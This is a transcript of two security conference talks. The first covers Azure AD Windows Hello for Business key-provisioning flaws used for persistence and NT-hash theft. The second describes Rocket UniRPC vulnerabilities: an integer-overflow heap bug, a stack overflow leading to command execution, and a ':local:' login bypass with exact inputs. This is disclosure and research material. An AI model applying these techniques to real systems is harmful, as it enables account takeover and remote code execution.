a normal primary refresh token, so this is one with just a username and password. We need to enrich that with the MFA claim, so it will automatically prompt us for MFA. We'll enter the MFA in there, and that will give us a new token, and with this token we can basically provision a new Windows Hello key. So we provisioned it, and then we can authenticate with this Windows Hello key and get a primary refresh token, and with the primary refresh token we can get new tokens that include the authentication methods RSA and MFA, which indicates that this was a Windows Hello authentication, because it was done using a private key, which also counts as MFA. It means that we didn't use a password, but we used a key to authenticate the user. So we can do this whole flow with roadtx if we want. So there are a few interesting observations in there. First of all, this full provisioning process, so deciding to start using Windows Hello, is completely controlled by the client. I mean, as an administrator you can set policies for whether you want to use Windows Hello for Business or not, but if you're using Azure AD devices only, it's basically always enabled. So if you can convince your device to start the enrollment, you can do it whether it's enabled or not; it's fully up to the device to do it or not. And of course any device and user combination in the tenant can create these keys and can register these keys on users, so you don't have a lot of control over this. And going back to this quite simple key provisioning protocol, there are basically two interesting parts: one is the key and one is the token. So I had a look at how this token works, and I found out that you didn't actually need this NGC MFA claim. You could just register a key with a normal token with normal MFA. So you did need multi-factor authentication, but it didn't need to be recent. So you could have some cached MFA claim in the browser, and that you could use to also provision a new key. So if you are an attacker and you have access to a signed-in browser session, or you are on a user's device already, then you can just use a single sign-on token or a cached token somewhere to actually provision a new key without needing to do this MFA process again. So here's just an example of an attack. In this case we are using the most recent version, so the Windows Hello for Business keys are safely stored and protected by the TPM, and the LSASS process can access them, but we cannot extract these keys. But if you are an attacker running some malware on this laptop, you can basically ask LSASS for some single sign-on data. You can say, hey, I want the token for this specific service, in this case the device registration service, with which we can provision a new key. And then basically we can get the token, we can register a new key, and now we have a key that we generated ourselves. So it's no longer in the TPM; we don't need to bother with trying to extract the key from a TPM. We don't even need admin privileges to do this; you can do this from a normal user session. And then basically you just register a new key that can be used to authenticate as that user. So just to show this, I'm using ROADtoken, which is a tool I wrote quite a while ago, to request this single sign-on data. There are some references on my blog; there are also some alternative methods to do this. But basically I get the single sign-on data, or PRT cookie as it's called, and this I can use with roadtx to get a token for the device registration service. So the device registration service token is needed to provision that key. Then I get the token, I store the token on disk, and with this token I provision this new key. So it saves the key to disk, and it sends the post request using the access token that we just got. We didn't need to authenticate; we just asked the operating system, hey, give me a token for this using single sign-on, and then we enrolled a new key. So we can get a PRT with this key, and basically now we have a primary refresh token with which we can do
single sign-on as the user. It's valid indefinitely, we can do re-authentication, it counts as multi-factor authentication, we can put this key somewhere, it's not protected by anything, and it's actually quite hard for the user to see that they have a new Windows Hello for Business key enrolled. And we can just get tokens with it, we can use it in a browser, whatever we want; we can access anything as the user, basically, at this point. The short version: it was possible to basically overwrite the key from a device using single sign-on, which completely defeats this protection of the TPM, because it doesn't matter if the key is in the TPM if you can just provision a new key that you control. This provides persistence for attackers pretty easily, because the new key is wherever the attacker decides. And an interesting thing is that a Windows Hello for Business key can be used with any device. So rather than the key being specific to a device, the key is valid for any device in the tenant. So you will need to have a real device or a fake device as an attacker, but any device will work with any key, as long as you have the key material. And there are also some tricks where you can basically restore the original key from the original device, so that the user's device will keep working and you just have an additional backdoor key there. It takes a bit of work, but it's possible. So there are some aspects left here. Of course, we also have Windows Hello for Business from the perspective of Azure AD itself. So how does Azure AD store these credentials? It turns out that the keys are stored on a user property called searchableDeviceKey. This is visible best in the internal version of the Azure AD Graph, and basically there we see this key, which is the public key. So that's the same key that we put in the post request earlier; it's just the public key that belongs to the private RSA key that's stored, hopefully, in the TPM. And we see this device ID as well, so this key belongs to this specific
device. So it turns out that users can modify their own searchableDeviceKey property, and as long as you have a token for the Azure AD Graph, then you can basically modify this and just add new keys as much as you want. And this doesn't require MFA, because as long as you have a token to modify it, it works. Of course, if you have very strict conditional access policies and you require MFA for literally everything, then you would still need MFA, but often companies have some gaps in their policies. They don't require MFA from on-prem VPN ranges or from some trusted devices, and then you can basically do this without MFA and bypass the whole "you need MFA to provision a key", because you can just provision the key by writing it to the user object directly. So this is a nice bypass for the conditional access MFA. There are some prerequisites for this. You will need a device as an attacker, which you could register on the fly: if you can get tokens for the device registration service, you can also register a device. And you need a valid access token, so you will need an access token to do this, but as long as you have that, then you're fine, basically. So that's also possible with roadtx. I made a genhellokey command that just generates the key and gives it to you in the right format, and then you take this JSON blob and you send a patch request, creating with this an extra key in there. So the only difference here is that now we do a patch: we have the user's access token, we patch their device keys, and then we can authenticate with this key without having to do the whole normal provisioning process. So here's just an example of what you can do with this. There's a way to do this basically via phishing, so that you don't need any existing access. I'm assuming that people are familiar with device code phishing; I don't know if we have time to explain it, but basically it's a technique where you initiate the authentication on a different device than the one your user is on. So as an attacker you would talk to Azure AD and say, hey, I want to initialize the device code flow. Then you phish the user and basically convince them to do the device authentication on their part. So it can be done with an email just saying, hey, go to this website, enter this code, and authenticate. And if you can convince the user to do that, then you can get an access token on behalf of the user for the correct API. Now, this token is already quite powerful, because you can do a lot of things with it, but with this token we can now also register a new Windows Hello key and then basically have persistent access to the user's information, and we can get access in any way that we want, which is a lot more, of course, than this single access token that we phished. So the attacker can register a device, register the Windows Hello keys as backdoor credentials, and from then on the attacker can just use the keys and get a token for whatever they want. They can log in interactively in the browser as the user and access the user's resources. There are some alternative scenarios. You can also abuse this with normal credential phishing: if you can convince users to log in on your fake website, you can also get a token and register the key. Again, if you have access to their device temporarily, so if you have malware running on there or they leave their laptop unlocked, you can also get the correct tokens and then just create these backdoor credentials. And the nice thing is that this also works on other accounts, as long as you have permissions to modify them. So there are roles in Azure AD that allow you to modify other accounts, which include the user administrator and of course global administrator, and they can basically create keys on other user objects. We'll look a bit more at this in a second. So this was purely Azure AD; we can also do this with hybrid scenarios. And if you want to use Windows Hello for Business in a hybrid scenario, then there are different methods
with different requirements and different complexities. I think the simplest one, and also the one that's recommended by Microsoft, is the cloud Kerberos trust. This doesn't require that much on-prem infrastructure: it doesn't require ADFS, it doesn't require PKI infrastructure on-prem. So this is the recommended way and the easiest way. And the nice thing about cloud Kerberos trust is that it basically creates a trust between Active Directory and Azure AD using the Kerberos protocol. So if you set this up, then basically what it does is it creates a read-only domain controller. It's not a real one, because there's no real server behind it, but basically it creates a read-only domain controller account which has some Kerberos keys registered, and it replicates these keys to Azure AD. So when a user authenticates with Windows Hello, Azure AD can give them a ticket, a ticket granting ticket in this case, which is signed with these keys of this read-only domain controller. And this is what we call a partial TGT, because Azure AD doesn't know all the user information that's stored on-prem, but it sends a ticket granting ticket with just enough information to authenticate the user to the on-prem domain. The user can then exchange this for a full ticket granting ticket, and with this full ticket granting ticket they can authenticate to any on-prem resources using Kerberos. And if the resources don't use Kerberos, then you can also obtain the NT hash of the user, so the user can also use NTLM authentication by getting the NT hash using the Kerberos protocol. Some technical details again: basically, when you request a primary refresh token using a Windows Hello for Business key, we can obtain the partial TGT, and we can exchange this for a full TGT that can be used to access Active Directory resources. Of course this only works for hybrid accounts, so the account should already exist in the on-prem Active Directory and in Azure AD, because otherwise, I mean, Azure AD can send a TGT for that account, but if the on-prem side doesn't know about the user, then it's not going to work. And basically this TGT looks like this. So we previously saw this response: here's the primary refresh token, the primary refresh token session key, and then we also get a ticket granting ticket included in that. This is the partial TGT, and we can exchange that for a full TGT. And this also allows some nice opportunities, because user administrators in Azure AD could provision these keys on user accounts. So if you had high-privilege Azure AD access, you could just create Windows Hello keys for everybody that you are allowed to modify, provided that you have the normal access rights. So there are some protections in Azure AD that prevent user administrators from creating keys on accounts with higher administrative roles, but if you have the correct privileges, then you can assign new Windows Hello keys. So you could add backdoor credentials to any user, you could then also get a PRT for them, also get a ticket granting ticket for them, and as long as you have connectivity to an on-prem domain controller, you could also authenticate to any on-prem resources. The only accounts this doesn't work for are domain admin accounts, because these have special protections, so you could not do this for domain admin accounts. But for any regular users, you could basically, by modifying their keys in Azure AD, get a ticket granting ticket for them and then move to their identities on-prem. A last example for this: we request the PRT for a hybrid user, so in this case the user has a hybrid account, it's a synced user, so it exists in Azure AD and in on-prem AD, using this Hello key and a device that we registered, so you still always need a device as an attacker. And basically we get this PRT, which also includes the ticket granting ticket. We can extract the ticket granting ticket from the primary refresh token data and save it in a ccache file, so I'm using some Impacket tools for this. We can also exchange this for a full ticket granting ticket by simply asking for a ticket granting ticket using the partial TGT. And what we also can do is recover the NT hash for this user. I could probably give an entire talk about how this protocol works exactly, but if you want to read about that, there was some nice research done a couple of years ago by Leandro. Basically, because of this whole setup, if you authenticate with Windows Hello for Business in a cloud Kerberos trust, then you can also get the NT hash when you authenticate. So as an end result, if I am a global admin or user admin in Azure AD, I could just provision keys for anybody that I want, and if I also have line of sight to the on-prem AD domain controllers, I could then also get their NT hashes, crack them, get their passwords, etc. I still need to upload these tools; they're not fully finished yet. This is basically part of my ROADtools hybrid toolset. So, the last part: the disclosure to Microsoft. Of course I submitted all this to Microsoft, because those are quite severe vulnerabilities and lateral movement opportunities. So I submitted this in October 2022, and basically from then on they acknowledged the issues and started working on fixes, and from February to April 2023 we had reports about the fix timeline. It was not always certain that the issues would be fixed before this talk, and eventually they fixed most of it before the talk. We also had some discussions about whether or not this was an identity bug or another kind of bug, and I'll save you that story as well. Basically, the end result is that last week and this week they rolled out the fixes for this, and they also blocked adding new keys via the searchableDeviceKey property, so if you try to do that now, it won't work anymore. And they now also properly require the NGC MFA claim to provision a new key via the device registration service; you cannot do this with an old MFA claim that's cached somewhere, you need to actually do MFA interactively in order to provision these new
keys. So, getting back to our questions. It provides strong phishing-resistant MFA: a bit questionable. I don't fully agree that this is MFA at all; I mean, it's just a key somewhere, and everything about where that key is stored and how it's handled is all pure assumption. I mean, you fully trust that the device actually puts it in the TPM; Azure AD cannot see whether it's in the TPM or not, it doesn't have any data on that. Phishing resistant: well, hopefully now it is; before, you could definitely register a key via phishing, so not fully phishing resistant. Requires MFA to provision: well, that definitely was not the case, since we could provision it with just an access token to the API, and whether or not you needed MFA for that was purely up to the tenant configuration. It's not bound to a specific device, so if you can dump the Windows Hello key from one device, you can use it with another device just fine. The keys are protected by the TPM: that still doesn't prevent attackers, if they have some form of access to the device, from actually using them. And there's another story here that I can't talk about yet, but that's for a next talk. But it's still more secure than password authentication; it's definitely not completely, horribly broken, and we should not all go back to weak passwords. I like Windows Hello. It's not perfect; there are some improvements now, and it's hopefully a bit more secure. Let's try to move away from passwords, because, well, we all know that having secure passwords is still an unsolved problem in our industry. So to end: all the tools in this talk are based on my ROADtools framework. They are open source. I already pushed the Windows Hello features, so you can play with them yourself, and I'll try to push the hybrid tools later this afternoon as well. I do have some ROADtools stickers, so if you see me walking around, then definitely ask me for some. And there's no time for questions now, but after the next presentation there's a Q&A in this room, so I'd be happy to take any
questions then, or via email, or via Twitter, or if you see me around, then definitely just ask and I'll be happy to answer. All right, so we'll be back in like 15 minutes, actually 5, so short break. Hello everyone, please have a seat. We're going to go ahead and proceed with the next talk. So we have with us Ron here. Ron is a lead vulnerability researcher at Rapid7. In his job he actually does some vulnerability research, or deep dives into some vulnerabilities that already exist so that we can understand what the hell is happening. Otherwise, he is one of the main organizers of the CTF at BSides San Francisco, and he also helps with a CTF in his own town of Winnipeg, which is called The Long Con CTF. I don't live in Winnipeg, so I've never heard of it. He also has birds, so if you want to ask him some really fun questions, ask about his birds. So Ron, thank you, and go ahead. Hi everyone, thanks for having me back. I think it's my second time speaking here, third or fourth time being here, so thanks for having me back over and over again. A quick introduction: as I mentioned, I have birds; those are Clang and Sharp. So yeah, I am a lead security researcher at Rapid7. My job is 50% looking at vulnerabilities that come out that we think are important and telling our customers, like, should you panic, should you patch, should you not worry. And the other half is finding vulnerabilities ourselves: picking a piece of software, like, say, the one we are talking about today, diving into it as deeply as I can, and finding all the bugs I can. And then I can talk about the results of one of those projects. You can find me online: iagox86 is my general alias everywhere. If Twitter is still up today, it will work; otherwise Mastodon or GitHub or whatever. And I've done lots of volunteer stuff. I guess I work at Rapid7, I should mention that. So this is going to be a deep dive looking at some vulnerabilities, specifically in Rocket Software's UniRPC server. I didn't name this software in the title because the
vulnerabilities weren't public when I submitted this talk. I found these back in January, submitted this talk in, I think, January, and then we disclosed everything in March, so it's all out now, but at the time I submitted this it wasn't. So we're going to look at software called UniData, version 8.2.4; that was the one they had on their trials page, so it's the one I chose. Finding the software is often the hard part of these projects. And I'm going to talk about a lot of protocol stuff, show some packet captures, and show some assembly and stuff like that, and I'll try to explain everything as I go and just kind of give you an idea of how I approach these kinds of projects. One of the questions I got asked, by Rocket Software themselves and others, is: why did you actually choose this? No one's really heard of this software. And it was kind of a personal, I won't say vendetta, but a personal project, because when I worked at Tenable in like 2010 or so, this vulnerability came across my plate, a packet header heap overflow, and I figured out the protocol back then, in like 2010, and thought, this looks really interesting, and I wrote the check for Nessus. Then I changed jobs and never came back to it until recently, and I thought, I really want to go back to this and look at the software. So I found it and convinced my boss that it was worthwhile despite not being well-known software. It's apparently typically found on back ends; most large aerospace companies and banks and other companies use this just on the back end. So it's not usually internet-facing, but it's popular. So I'm going to talk about what UniRPC is, how it works, stuff like that. Basically, UniData and UniVerse and other tools made by this company come with a service called UniRPC, Uni Remote Procedure Calls. And UniRPC is an RPC server which basically has a list of services that it executes. A user connects on a specific TCP port, which I'll mention after, and says, I want to use this service, and it checks its database and says, oh
I have access to this service, here you go, and it just gives you a TCP connection to that service, and then you talk to that service directly from then on. All the communication is done by standard packets — they have a header, they have metadata, they have a body — and we'll see what those details are in a minute. So one of the first things I do is look for attack surface. I install the software, I execute the software — that usually takes two or three days because of licensing and because of either the wrong OS or the wrong version of Fedora — but when you eventually get it running, you can run netstat and see that it listens on TCP port 31438, which I'm going to forget during the talk, but that is the port that is interesting. So what services can I actually execute? When you install the software, it comes with a file called unirpcservices. I saw the file, I saw it being read by the process, and the first instinct I have is to reverse engineer the process to figure out what this file means. And if you look at the file, I think a lot of the fields you can kind of guess from context: the first column, udcs, looks like a name; there are obviously binaries, they're in a /bin directory; this star we can guess might be an ACL of some sort; protocol is 0; and then 3600 is an hour in seconds, so I'm guessing it's a timeout. So I spent probably a day learning how the file is parsed and what the fields mean and everything. Then when I was writing this talk, I googled the name of the file, and it's actually documented — so it turns out I should have just read the manual. I was correct, but this is what I often forget to do. So one such service in that file is udserver, and I'm just going to choose a service to talk about, completely arbitrarily, this one for now. On the top line you'll see the entry from that file we just saw; it's one of the lines in this file. So if you have an entry in that file, when a client connects it can send this packet that's here — if it's too small to read, it's not a big deal; it's not super
important what all the bytes mean, but the first packet a client sends will be: hey, please use the udserver service. And UniRPC will parse its file and say, is one of our services called udserver? Oh, there it is — and then it will execute that binary. You can see on the bottom there's a debug log; it says found service, executing the udserver binary. Obviously, if I'm doing an application review, I want to see what it's executing — can I make it execute my stuff, or can it only execute their stuff? In this case it can only execute their binaries, but that's definitely a thing I looked at. So we've seen this packet capture a couple times; let's kind of dive into what it means. I want to give sort of a quick overview. I have a lot of slides with a lot of packets on them, and I'm going to skip through them somewhat quickly, because I just want to give the idea of how this works, not necessarily every single detail. Then we'll look along the way at the vulnerabilities we found while actually looking at these packets. So, as far as I can tell, UniRPC uses a custom binary protocol, but I didn't actually Google it, so maybe it's documented, I don't know. But even if it was a standard protocol or was documented, it's always nice to reverse engineer it from the binary to see if there's anything interesting: how they handle length fields, how it executes other processes, and — when you're looking for vulnerabilities — are there undocumented header flags, stuff like that. So this was originally the end of the section, but I realized I was going to dive into a bunch of detail, so I wanted to put it at the beginning of the section instead. Every message you see will have a 20-byte header, which contains the version, the size, the number of parameters, stuff like that. Then there's some metadata, which is types — basically the client will say, I'm going to send you a string and an int: I'm going to send you a 10-byte string and then the integer. And then the data — the actual string and integer. So
just really quickly looking at this, what you're seeing here is a 20-byte header, 16 bytes of metadata, and then the rest is the strings. We'll see more examples of that. So when I'm looking at these kinds of applications, I want to look for attack surface: where is it parsing packets, where is it actually doing the things it's doing? Thankfully, when it's a Linux binary, I can run it in a debugger, and you'll see I'm using GDB, which is the built-in debugger that most people use on Linux. I also hacked the executable to get rid of the forking — you'll see that in the UniRPC one-shot; it just removes the fork call. I used to have a slide about that, but it was boring, so I put my blog link instead. So basically I run it in a debugger and I put a breakpoint on accept. The accept function is called by the UniRPC server to accept a new connection: a client connects, this accept call completes, and there'll be a new socket created. So I want to look at where that happens in the code, and there's a little bit of assembly code at the bottom — it's not a big deal, there's not actually anything too exciting happening. One thing I always like is looking at debug messages, though, like "accepted socket is from IP number," which tells me that I can match up that debug message with the two sides — you'll see the same debug message here, "accepted socket is from IP number." Being able to match up things you see in the debug output with things you see in the binary is good. But the accept function is not super interesting, so I'll move on to where it does get interesting, which is receive. The first place I want to look is where the connection is accepted; the second place I want to look is where the data comes in — where it receives that data, which is then going to get parsed. So
the beginning of what's interesting, or what's attackable, is going to be what the receive function does. So you'll see I run the UniRPC one-shot in GDB, I put a breakpoint on the receive function, then I run it. It's receiving data from file descriptor 8, which doesn't really matter, into a buffer at this address, which doesn't really matter, and we see it receives 8,216 bytes or less. That's an interesting number because it's close to a power of 2 — 8,192 is a power of 2 — so it's a power of 2 plus a little bit, 24 bytes or so, which would sort of mean something. So I run the bt command, which is backtrace, and that asks the debugger to tell me: how did we get here? What function called what function called what function to get us here? And what we see is the main function calls accept_connection. I should say, because we have named functions, not memory addresses, we have symbols, and that makes it much, much easier to reverse than if we had to figure out what each function does. But we have accept_connection, which calls read_packet, which calls read_message, which calls readn. readn reads n bytes: it's called with a parameter of, like, a thousand, and then it reads a thousand bytes. That's all readn does. And then read_message is what's going to parse the header. So I mentioned there's a 20-byte packet header; these are just a couple examples of code from it. What they're actually doing isn't super important, but when it reads the header, it reads those 20 bytes, and it does checks like: compare the first byte to 0x6C. If it's 0x6C, proceed; if it's not, return a version-mismatch error. So basically the first byte has to be 0x6C, then the second byte has to be 0x01 or 0x02, then the third and fourth bytes are ignored, and so on. So I'm going to look for all these things and what's happening. One of the fields that's interesting — and this is where we're going to get into a vulnerability — is the length field.
So there's a 32-bit length field in the packet header, and it says the length of the body of this packet is going to be 20 bytes or 100 bytes or 1,000 bytes. And it's going to do some checks on it. First of all — hard to read my own stuff here — it checks the length field; I circled it in red, you should see it. So it tests EDI, and EDI is like a variable; it happens to be the length. It's going to test the length and jump if it's less than or equal to zero — make sure the length isn't zero and make sure the length isn't negative. That's good, because if the client said, hey, I'm sending you negative 10 bytes, the server is like, well, that doesn't make sense. So it's going to make sure it's not negative. Then it adds 0x17 to the value, and then it does a second comparison: it compares the length, after adding 0x17, to the size of the buffer, which is 0x2018 by default, but that can change. Something you learn to look for when you're looking for vulnerabilities is a check that something's above zero, then adding something to it, then doing a different check — because integer overflows are a thing. If your size happens to be very, very high, like 0x7FFFFFFF, and you add 0x17 to it, the size is now negative. So the size was positive, you add 0x17, and now, is it less than 0x2018? If it's now negative, yeah, it's less than 0x2018 by a lot. And that's what we can do. So if we send the size 0x7FFFFFFF and then print it, we see 2.14 billion, I think, which is the highest signed 32-bit integer. Then down on the bottom it adds 0x17 to it, we print the register again, and now it's negative 2.1 billion, which means it's wrapped around and is now negative. So if we send a body length of 0x7FFFFFFF, when it goes back to the receive function, it's going to try to receive 2.1 billion bytes into a buffer that's 0x2018 — about 8,000 — bytes. 2 billion is higher than 8,000, so that overflows, overwrites memory, and causes a heap corruption.
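The wraparound is easy to demonstrate outside a debugger. Here's a minimal Ruby sketch of the two checks just described — the 0x17 adjustment and the 0x2018 buffer size are taken from the talk; the function names are mine, not the server's:

```ruby
# Reinterpret an integer as a 32-bit signed value, the way the server's
# 32-bit arithmetic would.
def to_int32(n)
  n &= 0xFFFFFFFF                                # truncate to 32 bits
  n >= 0x80000000 ? n - 0x100000000 : n          # reinterpret as signed
end

# Simulate the server's two length checks.
def length_checks_pass?(len, bufsize = 0x2018)
  return false if len <= 0                       # first check: must be positive
  adjusted = to_int32(len + 0x17)                # server adds 0x17...
  adjusted < bufsize                             # ...then compares to the buffer
end

# A large-but-sane length correctly fails (too big for the buffer):
puts length_checks_pass?(0x10000)                # => false
# But 0x7FFFFFFF wraps negative after the add, so it "fits":
puts to_int32(0x7FFFFFFF + 0x17)                 # => -2147483626
puts length_checks_pass?(0x7FFFFFFF)             # => true
```

So the malicious length sails through the size check, and the receive loop then tries to read ~2.1 billion bytes into the ~8 KB buffer.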
So we called this vulnerability CVE-2023-28501. It's a likely exploitable heap overflow that I didn't bring the exploit for, because it seems really hard, and there were easier ones. So that's one vulnerability. This slide I debated keeping or not, because it's not really an interesting vulnerability, but it's a silly mistake that they made. One of the bytes in the packet header is compression: if it's set to 1, the packet's compressed; if it's set to 0, it's not. The compression function they use is called LZ4_decompress_safe. I tried to make test data for this — I tried to LZ4-compress data in different ways, and I never did figure out how to make data that actually worked, which is sort of funny. I wrote a blog that's linked at the bottom; I'll send you these slides afterwards if you want to check these links out. But I made the program generate its own compressed data, and then I was able to test this and all that. What's interesting is if you send invalid data: LZ4_decompress_safe returns only success or failure, not why it failed. Which means if it failed, the program assumes the decompressed data was too long, so it allocates more memory and tries again. If it fails again, it allocates more memory and tries again. And it'll keep on reallocating more and more memory until it tries to allocate, like, 18 billion billion bytes and then fails. So that's just a really silly denial of service from forgetting to check buffer sizes. It's not exploitable, but just kind of a weird vulnerability. There's also an encryption field. So we looked at the length field, we looked at the compression field; there's also an encryption field telling the server that if this field is set to non-zero, the packet's encrypted. And by encrypted, I mean XORed by one.
So, basically, if the encryption's on, the encryption key is either two or one, depending on the version, and then each byte is XORed with that key — and that's "encrypting." As far as I can tell, the real clients and servers never use this, but my Metasploit module I wrote for this eventually does, because, I mean, why not keep the payloads out of the clear text? So once the message is read — we talked about the header; there are all these different header fields, and I have a list of them that I should have put earlier — after the header is finished, it then reads the body. The body of the message is much, much, much more complex than the header. So rather than going through the assembly and all these different notes I made and all this junk, we're just going to look at the packet captures and figure things out from the packets. This is where I'm going to actually look at the traffic on the wire. At the top you'll see the packet we saw before, where you say, please connect me to udserver, and at the bottom you see the version number come back — basically a success. What you're seeing is a header, metadata, and then a freeform body; we'll see what each of those means. So this is the header. We've looked at this a couple of times. The version byte has to be 0x6C. The body length has to be above zero. LZ4 is the compression field; encryption is the encryption field. There are several padding fields that can be anything — I set them to, like, ABCD in my implementations. There's a number of arguments, and then there's a length of the data. Data length is not really used — it's parsed and processed, but it's not used by anything, so I think it's legacy. But arg count is what's interesting, because it's how many arguments are being sent. So here are some examples. I'm going to go through these pretty quickly, but this is where you can match up the packets you see in Wireshark to the structure I gave.
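As a rough feel for building one of these headers — version byte, body length, compression and encryption flags, padding, arg count, and the unused data length — here's a Ruby sketch. The field order and widths here are illustrative guesses, not the real offsets (LibNeptune has the actual layout); only the 20-byte total, the 0x6C/0x01 bytes, and the field list come from the talk:

```ruby
# Illustrative only: pack a 20-byte UniRPC-style header. Field order and
# widths are guesses for demonstration; see LibNeptune for the real layout.
def build_header(body_length:, arg_count:, compressed: false, encrypted: false)
  [
    0x6c,                 # "version" byte the server checks for
    0x01,                 # second required byte (0x01 or 0x02)
    0x4141,               # two ignored bytes ("AA" -- padding can be anything)
    body_length,          # 32-bit body length (the overflow-prone field)
    compressed ? 1 : 0,   # LZ4 compression flag
    encrypted ? 1 : 0,    # XOR "encryption" flag
    0x41414141,           # more padding
    arg_count,            # number of arguments that follow
    0,                    # data length (parsed but unused -- legacy)
  ].pack('CCnNCCNNn')     # 1+1+2+4+1+1+4+4+2 = 20 bytes, big-endian
end

hdr = build_header(body_length: 24, arg_count: 2)
puts hdr.bytesize         # => 20
```

The point is just the shape: a fixed-size header where a handful of bytes are checked, a couple are length fields worth attacking, and the rest is ignored padding.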
If you actually want to implement this protocol or something, you can probably go back and use these slides, but I'm going to skip through them pretty quick. So after the header, there are argument definitions: you'll have zero or more fields, based on the number of arguments. This packet has two arguments: the first argument is type two, which is a string, and the second argument is type zero, which is an integer. So a string and an integer — that's the metadata. And then in the actual data section you'll see the string is "udserver" — the YYY is just padding — and then the integer is 0x539, which is hex for 1337. That's the "secure" flag, and sometimes it's required to be set, but you can set it yourself, so it doesn't actually secure anything. This slide just shows what I just showed in a graphical way. Then the actual data section of the packet is just the data: we saw we have a type two, which is a string, and the string is "udserver." I just talked about this. And when the server responds, it does the same thing. The server says, I have two arguments: the first one's a string, the second one's an integer — and if the service doesn't exist, that integer will be something that's not zero. That's just showing the same stuff. So, TL;DR, this is what the messages look like. I didn't want to draw too much, but I did do an open-source implementation of this whole thing. This is from something I called LibNeptune, and LibNeptune is an implementation of the protocol as a library in Ruby. So if you ever want to write something for Metasploit involving Rocket UniData, you can. I named it Neptune after the escape rocket, if anyone plays that game — because rocket, Neptune. So I'm going to show you three messages that do a thing that's interesting, which is run an OS command. Then I'm going to show you two ways to bypass all the checks that we're going to see, and then we're going to call it done. So here is a conversation.
The first one is: please use a service. We're going to use the service udadmin. I think I had a slide about why we chose udadmin, but I don't know where it went, so we'll see when it turns up. Basically this says, please use udadmin; my secure flag is 1337, which means I'm 1,337 times secure. When you do that, it's going to run the udadmin server process, and that process wants you to authenticate. It says, before you can do anything, please send me opcode 0xF, which is 15, which means authenticate, along with a username string and a password string. The username string you'll see is plain text — it's R-O-N, and then Y-Y-Y-Y, because I just pad with Y so I can see what's going on. So the integer is 15, the string username is "ron," and the string password is 969098... and it's "encrypted," quotation marks. So I send the username, I send the password, and it simply responds with one integer value, zero. One integer value zero means authentication was successful; if you failed, it would be a non-zero integer. Then you can run a command. Opcode 6 means OS command. Once you've authenticated — and you have to authenticate as a Linux user on the machine, so you're basically as good as SSHing — you can tell it to run a command. There are like 150 opcodes; I've only tested the one, because once I can run a command, I don't need the rest. So basically you send opcode 6, and then you send it a string with what to run. In this example I just run whoami, and in the response it returns "ron." It returns negative 2 for the command result — I'm not sure why it's negative 2, but it is — and then the string "ron." So with a username and password, we can run code, is what I'm saying. This is why I chose this service — so that's where that slide went. So why the udadmin server? It's because I ran strings and saw "OS command." And once I see OS command, I'm just going to use that one, because it sounds like fun. It's also the biggest — it's by far bigger than the other processes.
It's 300 kilobytes; the rest are like 20 to 60. So it's going to be the most interesting — the most code, and it has OS command. Who can resist? So once you connect, as I said, you need to send authentication. You either send opcode 15, or you send opcode, I think, 6? No, 8. If you send 8, it returns "coming soon" and then closes the connection. It never came soon. But if you give it 15, it authenticates you. It'll take your username as a string and then strcpy it into a buffer. Uh-oh. If you send a name of 200 letter A's, you can overflow the return address and set your return address to all A's. This is what we called CVE-2023-28502. But I'm lazy, and strcpy doesn't like null bytes — and I do like null bytes, because I want to return to a memory address; I want to write easy exploits. So let's look at the password. The password is also strcpy'd into a buffer. After it strcpys it and null-terminates it, it then calls a function called RPC encrypt. You would think RPC encrypt would encrypt the packet. And it, well, it NOTs each byte — negates each byte. It's like encryption. It basically goes through each byte in the password and NOTs it: 00 becomes FF, 01 becomes FE, and so on and so on. That's not really encryption. What it does mean is I can now use null bytes in an exploit. So basically we send — I can't remember what the return address offset is, but we send like 150 letter A's, then a return address. There's actually a return address in the software that will run whatever's on the stack, which, if you do exploit dev, is really nice: all it does is pass whatever RSP points at into the system call, and then run it. So we can run, like, a reverse shell, like netcat — we can do whatever. So this is the actual form of CVE-2023-28502, which is basically a stack overflow that lets us execute arbitrary code. And we wrote this exploit, and we released this exploit, and it's out there. But it's still hard.
You have to overwrite return addresses and do a bunch of work. So let's say we don't overflow the fields — which takes all the willpower I have. If we don't overflow them, we get to a call named impersonate user. Impersonate user takes the username and password as parameters. If we look at the code for it — this is in the library now, not in the main executable — impersonate user just calls do logon user, basically, and nothing else. Do logon user is interesting, because it checks if the username is ":local:". It looks for that very specific username, and if it matches, then it calls strchr to find a colon in the password, then calls strchr again to find a second colon. So you have a username of ":local:" and a password of A:B:C, and something special happens. Something special means I get code execution. So basically, after it parses the password into A:B:C, it passes B, the second field, into strtol, which converts it to an integer — the string 1337 becomes the integer 1337. It also passes the third field into strtol. And then it does a couple of checks. It passes the first field into getpwnam. getpwnam looks up a username on the local Linux system: if I pass it "ron," it returns the account data for ron; if I pass it "root," it returns the data for root. So if the first field of the password is "ron," that getpwnam lookup will succeed. The second thing it does is compare the second field to the user ID of that user. So if the username is ron, it checks if the middle field is 1,000; if the username is root, it checks the middle field is 0. And if that matches, it keeps going. The third field, it only checks that it's non-zero: if it's 0, it fails; if it's 123, it works. So basically, with the username ":local:", the password ron:1000:1000 will succeed if the ron account exists and has UID 1,000.
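The parsing logic just described can be sketched roughly like this in Ruby — function and variable names are mine, and this is a simplification of the decompiled code, not the vendor's source:

```ruby
require 'etc'

# Sketch of the do_logon_user backdoor logic described above.
# Password format: "<username>:<uid>:<nonzero>"; login name must be ":local:".
def local_backdoor_ok?(login, password)
  return false unless login == ':local:'        # the magic username
  user, uid, flag = password.split(':', 3)      # the two strchr'd colons
  return false if uid.nil? || flag.nil?         # need both colons present
  entry = begin
    Etc.getpwnam(user)                          # getpwnam() account lookup
  rescue ArgumentError
    return false                                # unknown user
  end
  entry.uid == uid.to_i && flag.to_i != 0       # uid must match; flag non-zero
end

# True on basically any Linux box, since root exists with UID 0:
puts local_backdoor_ok?(':local:', 'root:0:123')
```

Nothing in that path ever looks at a real credential, which is why supplying ":local:" with "root:0:123" works everywhere.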
